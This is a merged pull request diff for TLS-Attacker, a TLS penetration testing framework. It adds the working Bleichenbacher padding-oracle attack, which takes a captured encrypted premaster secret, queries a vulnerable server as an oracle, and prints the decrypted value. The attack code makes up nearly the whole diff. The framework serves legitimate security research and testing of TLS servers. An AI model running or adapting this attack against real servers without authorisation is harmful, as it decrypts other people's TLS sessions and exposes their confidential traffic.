Merge pull request #392 from RUB-NDS/bleichenbacherAttackCode

Bleichenbacher attack code

Author: jurajsomorovsky

Attacks/src/main/java/de/rub/nds/tlsattacker/attacks/Main.java

@@ -164,7 +164,7 @@ public static void main(String[] args) {
         } else {
 
             if (attacker.getConfig().isExecuteAttack()) {
-                attacker.checkVulnerability();
+                attacker.attack();
             } else {
                 try {
                     Boolean result = attacker.checkVulnerability();

Attacks/src/main/java/de/rub/nds/tlsattacker/attacks/config/BleichenbacherCommandConfig.java

@@ -20,7 +20,6 @@
 import de.rub.nds.tlsattacker.core.constants.AlgorithmResolver;
 import de.rub.nds.tlsattacker.core.constants.CipherSuite;
 import de.rub.nds.tlsattacker.core.constants.KeyExchangeAlgorithm;
-import de.rub.nds.tlsattacker.transport.TransportHandlerType;
 import java.util.LinkedList;
 import java.util.List;
 
@@ -46,7 +45,7 @@ public class BleichenbacherCommandConfig extends AttackConfig {
             + "FULL results in a comprehensive server evaluation.")
     private Type type = Type.FAST;
     @Parameter(names = "-msgPkcsConform", description = "Used by the real Bleichenbacher attack. Indicates whether the original "
-            + "message that we are going to decrypt is PKCS#1 conform or not (more precisely, whether it starts with 0x00 0x02.")
+            + "message that we are going to decrypt is PKCS#1 conform or not (more precisely, whether it starts with 0x00 0x02).", arity = 1)
     private boolean msgPkcsConform = true;
 
     public BleichenbacherCommandConfig(GeneralDelegate delegate) {

Attacks/src/main/java/de/rub/nds/tlsattacker/attacks/impl/BleichenbacherAttacker.java

@@ -8,24 +8,31 @@
  */
 package de.rub.nds.tlsattacker.attacks.impl;
 
+import de.rub.nds.modifiablevariable.util.ArrayConverter;
 import de.rub.nds.tlsattacker.attacks.config.BleichenbacherCommandConfig;
+import de.rub.nds.tlsattacker.attacks.pkcs1.Bleichenbacher;
 import de.rub.nds.tlsattacker.attacks.pkcs1.BleichenbacherWorkflowGenerator;
 import de.rub.nds.tlsattacker.attacks.pkcs1.BleichenbacherWorkflowType;
 import de.rub.nds.tlsattacker.attacks.pkcs1.Pkcs1Vector;
 import de.rub.nds.tlsattacker.attacks.pkcs1.Pkcs1VectorGenerator;
+import de.rub.nds.tlsattacker.attacks.pkcs1.VectorFingerprintPair;
+import de.rub.nds.tlsattacker.attacks.pkcs1.oracles.RealDirectMessagePkcs1Oracle;
 import de.rub.nds.tlsattacker.attacks.util.response.EqualityError;
 import de.rub.nds.tlsattacker.attacks.util.response.EqualityErrorTranslator;
 import de.rub.nds.tlsattacker.attacks.util.response.FingerPrintChecker;
 import de.rub.nds.tlsattacker.attacks.util.response.ResponseExtractor;
 import de.rub.nds.tlsattacker.attacks.util.response.ResponseFingerprint;
 import de.rub.nds.tlsattacker.core.config.Config;
+import de.rub.nds.tlsattacker.core.constants.ProtocolVersion;
+import de.rub.nds.tlsattacker.core.exceptions.ConfigurationException;
 import de.rub.nds.tlsattacker.core.state.State;
 import de.rub.nds.tlsattacker.core.util.CertificateFetcher;
 import de.rub.nds.tlsattacker.core.util.LogLevel;
 import de.rub.nds.tlsattacker.core.workflow.WorkflowExecutor;
 import de.rub.nds.tlsattacker.core.workflow.WorkflowExecutorFactory;
 import de.rub.nds.tlsattacker.core.workflow.WorkflowTrace;
 import java.io.IOException;
+import java.math.BigInteger;
 import java.security.interfaces.RSAPublicKey;
 import java.util.LinkedList;
 import java.util.List;
@@ -39,6 +46,8 @@ public class BleichenbacherAttacker extends Attacker<BleichenbacherCommandConfig
 
     private final Config tlsConfig;
 
+    private BleichenbacherWorkflowType vulnerableType;
+
     public BleichenbacherAttacker(BleichenbacherCommandConfig bleichenbacherConfig) {
         super(bleichenbacherConfig);
         tlsConfig = bleichenbacherConfig.createConfig();
@@ -56,8 +65,7 @@ public State executeTlsFlow(BleichenbacherWorkflowType type, byte[] encryptedPMS
 
     @Override
     public Boolean isVulnerable() {
-        RSAPublicKey publicKey;
-        publicKey = (RSAPublicKey) CertificateFetcher.fetchServerPublicKey(tlsConfig);
+        RSAPublicKey publicKey = (RSAPublicKey) CertificateFetcher.fetchServerPublicKey(tlsConfig);
         if (publicKey == null) {
             LOGGER.info("Could not retrieve PublicKey from Server - is the Server running?");
             return null;
@@ -76,6 +84,7 @@ public Boolean isVulnerable() {
             LOGGER.debug("Testing: " + bbWorkflowType);
             EqualityError error = isVulnerable(bbWorkflowType, pkcs1Vectors);
             if (error != EqualityError.NONE) {
+                vulnerableType = bbWorkflowType;
                 return true;
             }
         }
@@ -84,46 +93,103 @@ public Boolean isVulnerable() {
     }
 
     private EqualityError isVulnerable(BleichenbacherWorkflowType bbWorkflowType, List<Pkcs1Vector> pkcs1Vectors) {
-        List<ResponseFingerprint> responseFingerprintList = new LinkedList<>();
-        for (Pkcs1Vector pkcs1Vector : pkcs1Vectors) {
-            State state = executeTlsFlow(bbWorkflowType, pkcs1Vector.getEncryptedValue());
-            if (state.getWorkflowTrace().allActionsExecuted()) {
-                ResponseFingerprint fingerprint = ResponseExtractor.getFingerprint(state);
-                responseFingerprintList.add(fingerprint);
-            } else {
-                LOGGER.warn("Could not execute Workflow. Something went wrong... Check the debug output for more information");
-            }
-            clearConnections(state);
-        }
-        if (responseFingerprintList.isEmpty()) {
+        List<VectorFingerprintPair> bleichenbacherVectorMap = getBleichenbacherMap(bbWorkflowType, pkcs1Vectors);
+        if (bleichenbacherVectorMap.isEmpty()) {
             LOGGER.warn("Could not extract Fingerprints");
             return null;
         }
-        for (int i = 0; i < responseFingerprintList.size(); i++) {
-            ResponseFingerprint fingerprint = responseFingerprintList.get(i);
-            Pkcs1Vector pkcs1Vector = pkcs1Vectors.get(i);
-            LOGGER.debug("\n PKCS#1 vector: {}\n Fingerprint: {}", pkcs1Vector.getDescription(), fingerprint.toString());
-        }
-        ResponseFingerprint fingerprint = responseFingerprintList.get(0);
-        for (int i = 1; i < responseFingerprintList.size(); i++) {
-            EqualityError error = FingerPrintChecker.checkEquality(fingerprint, responseFingerprintList.get(i), false);
+        printBleichenbacherVectormap(bleichenbacherVectorMap);
+        ResponseFingerprint fingerprint = bleichenbacherVectorMap.get(0).getFingerprint();
+        for (VectorFingerprintPair pair : bleichenbacherVectorMap) {
+            EqualityError error = FingerPrintChecker.checkEquality(fingerprint, pair.getFingerprint(), false);
             if (error != EqualityError.NONE) {
                 LOGGER.log(LogLevel.CONSOLE_OUTPUT, "Found a difference in responses in the {}.",
                         bbWorkflowType.getDescription());
                 LOGGER.log(LogLevel.CONSOLE_OUTPUT,
-                        EqualityErrorTranslator.translation(error, fingerprint, responseFingerprintList.get(i)));
-                LOGGER.debug("Fingerprint1: {}", fingerprint.toString());
-                LOGGER.debug("Fingerprint2: {}", responseFingerprintList.get(i).toString());
+                        EqualityErrorTranslator.translation(error, fingerprint, pair.getFingerprint()));
                 return error;
             }
         }
         return EqualityError.NONE;
     }
 
+    private void printBleichenbacherVectormap(List<VectorFingerprintPair> bleichenbacherVectorMap) {
+        LOGGER.debug("Vectormap:");
+        LOGGER.debug("---------------");
+        for (VectorFingerprintPair pair : bleichenbacherVectorMap) {
+            LOGGER.debug(pair);
+        }
+        LOGGER.debug("---------------");
+    }
+
+    private List<VectorFingerprintPair> getBleichenbacherMap(BleichenbacherWorkflowType bbWorkflowType,
+            List<Pkcs1Vector> pkcs1Vectors) {
+        List<VectorFingerprintPair> bleichenbacherVectorMap = new LinkedList<>();
+        for (Pkcs1Vector pkcs1Vector : pkcs1Vectors) {
+            ResponseFingerprint fingerprint = getFingerprint(bbWorkflowType, pkcs1Vector.getEncryptedValue());
+            if (fingerprint != null) {
+                bleichenbacherVectorMap.add(new VectorFingerprintPair(fingerprint, pkcs1Vector));
+            }
+        }
+        return bleichenbacherVectorMap;
+    }
+
+    private ResponseFingerprint getFingerprint(BleichenbacherWorkflowType type, byte[] encryptedPMS) {
+        State state = executeTlsFlow(type, encryptedPMS);
+        if (state.getWorkflowTrace().allActionsExecuted()) {
+            ResponseFingerprint fingerprint = ResponseExtractor.getFingerprint(state);
+            clearConnections(state);
+            return fingerprint;
+        } else {
+            LOGGER.warn("Could not execute Workflow. Something went wrong... Check the debug output for more information");
+        }
+        return null;
+    }
+
     @Override
     public void executeAttack() {
-        // removed for now
-        throw new UnsupportedOperationException("Not implemented yet");
+        // needs to execute the isVulnerable method to configure the workflow
+        // type
+        boolean vulnerable = isVulnerable();
+        LOGGER.info("Using the following oracle type: {}", vulnerableType);
+
+        if (!vulnerable) {
+            LOGGER.warn("The server is not vulnerable to the Bleichenbacher attack");
+            return;
+        }
+        RSAPublicKey publicKey = (RSAPublicKey) CertificateFetcher.fetchServerPublicKey(tlsConfig);
+        if (publicKey == null) {
+            LOGGER.info("Could not retrieve PublicKey from Server - is the Server running?");
+            return;
+        }
+
+        if (config.getEncryptedPremasterSecret() == null) {
+            throw new ConfigurationException("You have to set the encrypted premaster secret you are "
+                    + "going to decrypt");
+        }
+
+        LOGGER.info("Fetched the following server public key: " + publicKey);
+        byte[] pms = ArrayConverter.hexStringToByteArray(config.getEncryptedPremasterSecret());
+        if ((pms.length * 8) != publicKey.getModulus().bitLength()) {
+            throw new ConfigurationException("The length of the encrypted premaster secret you have "
+                    + "is not equal to the server public key length. Have you selected the correct value?");
+        }
+        RealDirectMessagePkcs1Oracle oracle = new RealDirectMessagePkcs1Oracle(publicKey, config,
+                extractValidFingerprint(publicKey, tlsConfig.getDefaultHighestClientProtocolVersion()), null,
+                vulnerableType);
+        Bleichenbacher attacker = new Bleichenbacher(pms, oracle, config.isMsgPkcsConform());
+        attacker.attack();
+        BigInteger solution = attacker.getSolution();
+        LOGGER.log(LogLevel.CONSOLE_OUTPUT, solution.toString(16));
+    }
+
+    private ResponseFingerprint extractValidFingerprint(RSAPublicKey publicKey, ProtocolVersion version) {
+        return getFingerprint(vulnerableType, Pkcs1VectorGenerator.generateCorrectPkcs1Vector(publicKey, version)
+                .getEncryptedValue());
+    }
+
+    private ResponseFingerprint extractInvalidFingerprint() {
+        return null;
     }
 
     private void clearConnections(State state) {

Attacks/src/main/java/de/rub/nds/tlsattacker/attacks/pkcs1/Bleichenbacher.java

@@ -40,7 +40,7 @@ public void attack() throws OracleException {
         int i = 0;
         boolean solutionFound = false;
 
-        LOGGER.debug("Step 1: Blinding");
+        LOGGER.info("Step 1: Blinding");
         if (this.msgIsPKCS) {
             LOGGER.info("Step skipped --> " + "Message is considered as PKCS compliant.");
             LOGGER.info("Testing the validity of the original message");

Attacks/src/main/java/de/rub/nds/tlsattacker/attacks/pkcs1/Pkcs1VectorGenerator.java

@@ -32,7 +32,7 @@ public class Pkcs1VectorGenerator {
 
     /**
      * Generates different encrypted PKCS1 vectors
-     * 
+     *
      * @param publicKey
      *            The publickey
      * @param type
@@ -59,9 +59,24 @@ public static List<Pkcs1Vector> generatePkcs1Vectors(RSAPublicKey publicKey, Ble
         }
     }
 
+    public static Pkcs1Vector generateCorrectPkcs1Vector(RSAPublicKey publicKey, ProtocolVersion protocolVersion) {
+        Pkcs1Vector encryptedVector = getPlainCorrect(publicKey.getModulus().bitLength(), protocolVersion);
+        try {
+            Cipher rsa = Cipher.getInstance("RSA/NONE/NoPadding");
+            rsa.init(Cipher.ENCRYPT_MODE, publicKey);
+            // encrypt all the padded keys
+            byte[] encrypted = rsa.doFinal(encryptedVector.getPlainValue());
+            encryptedVector.setEncryptedValue(encrypted);
+            return encryptedVector;
+        } catch (BadPaddingException | IllegalBlockSizeException | InvalidKeyException | NoSuchAlgorithmException
+                | NoSuchPaddingException ex) {
+            throw new ConfigurationException("The PKCS#1 attack vectors could not be generated.", ex);
+        }
+    }
+
     /**
      * Generates different plain PKCS1 vectors
-     * 
+     *
      * @param publicKeyBitLength
      *            The publicKeyBitLength
      * @param type
@@ -110,9 +125,18 @@ public static List<Pkcs1Vector> generatePlainPkcs1Vectors(int publicKeyBitLength
         return pkcs1Vectors;
     }
 
+    private static Pkcs1Vector getPlainCorrect(int publicKeyBitLength, ProtocolVersion protocolVersion) {
+        byte[] keyBytes = new byte[HandshakeByteLength.PREMASTER_SECRET];
+        Arrays.fill(keyBytes, (byte) 42);
+        keyBytes[0] = protocolVersion.getMajor();
+        keyBytes[1] = protocolVersion.getMinor();
+        int publicKeyByteLength = publicKeyBitLength / 8;
+        return new Pkcs1Vector("Correctly formatted PKCS#1 PMS message", getPaddedKey(publicKeyByteLength, keyBytes));
+    }
+
     /**
      * Generates a validly padded message
-     * 
+     *
      * @param rsaKeyLength
      *            rsa key length in bytes
      * @param symmetricKey

Attacks/src/main/java/de/rub/nds/tlsattacker/attacks/pkcs1/VectorFingerprintPair.java

@@ -0,0 +1,44 @@
+/**
+ * TLS-Attacker - A Modular Penetration Testing Framework for TLS
+ *
+ * Copyright 2014-2017 Ruhr University Bochum / Hackmanit GmbH
+ *
+ * Licensed under Apache License 2.0
+ * http://www.apache.org/licenses/LICENSE-2.0
+ */
+package de.rub.nds.tlsattacker.attacks.pkcs1;
+
+import de.rub.nds.tlsattacker.attacks.util.response.ResponseFingerprint;
+
+public class VectorFingerprintPair {
+
+    private ResponseFingerprint fingerprint;
+
+    private Pkcs1Vector vector;
+
+    public VectorFingerprintPair(ResponseFingerprint fingerprint, Pkcs1Vector vector) {
+        this.fingerprint = fingerprint;
+        this.vector = vector;
+    }
+
+    public ResponseFingerprint getFingerprint() {
+        return fingerprint;
+    }
+
+    public void setFingerprint(ResponseFingerprint fingerprint) {
+        this.fingerprint = fingerprint;
+    }
+
+    public Pkcs1Vector getVector() {
+        return vector;
+    }
+
+    public void setVector(Pkcs1Vector vector) {
+        this.vector = vector;
+    }
+
+    @Override
+    public String toString() {
+        return "PKCS#1 Vector: " + vector.getDescription() + " Fingerprint=" + fingerprint.toString();
+    }
+}